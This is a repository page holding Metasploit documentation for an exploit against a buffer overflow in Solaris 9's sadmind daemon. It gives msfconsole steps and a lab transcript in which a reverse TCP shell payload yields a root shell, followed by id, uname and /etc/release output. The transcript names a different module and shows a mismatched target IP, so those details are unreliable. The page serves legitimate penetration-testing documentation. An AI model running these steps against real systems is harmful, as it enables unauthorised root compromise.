adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/exploit/solaris/sunrpc/sadmind_adm_build_path.md
T
cgranleese-r7 469f102596 Updates docs to reflect new default prompt
2025-07-17 09:53:40 +01:00

2.6 KiB
Raw Blame History

Vulnerable Application

This module exploits a buffer overflow vulnerability in adm_build_path() function of Sun Solstice AdminSuite sadmind daemon.

The distributed system administration daemon (sadmind) is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations.

The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received. The sadmind daemon process continues to run for 15 minutes after the last request is completed, unless a different idle-time is specified with the -i command line option. The sadmind daemon may be started independently from the command line, for example, at system boot time. In this case, the -i option has no effect; sadmind continues to run, even if there are no active requests.

This module has been successfully tested on:

  • Solaris 9u2 12/02 (x86);
  • Solaris 9u7 09/04 (x86);
  • Solaris 9u8 09/05 (x86).

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/solaris/sunrpc/sadmind_adm_build_path
  3. Do: set rhosts [rhost]
  4. Do: exploit
  5. You should get a new session as the root user.

Options

Scenarios

Solaris 9u2 12/02 s9x_u2wos_10 (x86)

msf > use exploit/solaris/sunrpc/sadmind_exec
msf exploit(solaris/sunrpc/sadmind_exec) > set rhosts 192.168.200.155
rhosts => 192.168.200.148
msf exploit(solaris/sunrpc/sadmind_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(solaris/sunrpc/sadmind_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.155:111 - Creating nop block...
[*] 192.168.200.155:111 - Trying to exploit sadmind with address 0x08062030...
[-] 192.168.200.155:111 - 192.168.200.155:111 - SunRPC - No response to SunRPC call for procedure: 1
[*] 192.168.200.155:111 - Trying to exploit sadmind with address 0x08069830...
[-] 192.168.200.155:111 - 192.168.200.155:111 - SunRPC - No response to SunRPC call for procedure: 1
[*] 192.168.200.155:111 - Trying to exploit sadmind with address 0x08071030...
[-] 192.168.200.155:111 - 192.168.200.155:111 - SunRPC - No response to SunRPC call for procedure: 1
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.155:32842) at 2025-04-21 08:18:47 -0400

id
uid=0(root) gid=0(root)
uname -a
SunOS unknown 5.9 Generic_112234-03 i86pc i386 i86pc
cat /etc/release
                         Solaris 9 12/02 s9x_u2wos_10 x86
           Copyright 2002 Sun Microsystems, Inc.  All Rights Reserved.
                        Use is subject to license terms.
                           Assembled 05 November 2002
Reference in New Issue View Git Blame Copy Permalink